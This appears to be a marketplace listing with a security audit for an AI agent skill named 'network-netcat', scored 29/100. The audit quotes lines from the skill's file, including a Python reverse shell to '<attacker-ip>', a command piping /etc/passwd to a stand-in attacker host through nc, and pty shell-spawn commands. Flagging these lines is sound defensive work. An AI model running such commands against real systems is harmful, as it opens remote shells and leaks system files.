Skip to main content

network-netcat

Facilitates network testing and security assessments using Netcat for connectivity checks, file transfers, and port scanning.

Install this skill

or
29/100

Security score

The network-netcat skill was audited on Feb 28, 2026 and we found 11 security issues across 3 threat categories, including 4 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 198

Direct command execution function call

SourceSKILL.md
198python -c 'import pty; pty.spawn("/bin/bash")'
high line 199

Direct command execution function call

SourceSKILL.md
199python3 -c 'import pty; pty.spawn("/bin/bash")'
high line 531

Direct command execution function call

SourceSKILL.md
531python -c 'import pty; pty.spawn("/bin/bash")'
medium line 182

Python subprocess execution

SourceSKILL.md
182python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess
high line 401

Access to /etc/passwd

SourceSKILL.md
401cat /etc/passwd | nc <attacker-ip> 5555
low line 18

External URL reference

SourceSKILL.md
18- https://nmap.org/ncat/guide/index.html
low line 19

External URL reference

SourceSKILL.md
19- https://attack.mitre.org/techniques/T1059/
low line 562

External URL reference

SourceSKILL.md
562- [Ncat Users' Guide](https://nmap.org/ncat/guide/index.html)
low line 563

External URL reference

SourceSKILL.md
563- [GTFOBins: netcat](https://gtfobins.github.io/gtfobins/nc/)
low line 564

External URL reference

SourceSKILL.md
564- [MITRE ATT&CK: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059/)
low line 565

External URL reference

SourceSKILL.md
565- [PTES: Post Exploitation](http://www.pentest-standard.org/index.php/Post_Exploitation)
Scanned on Feb 28, 2026
View Security Dashboard
Installation guide →
GitHub Stars 278
Rate this skill
Categorydevelopment
UpdatedMay 21, 2026
aiskillstore/marketplace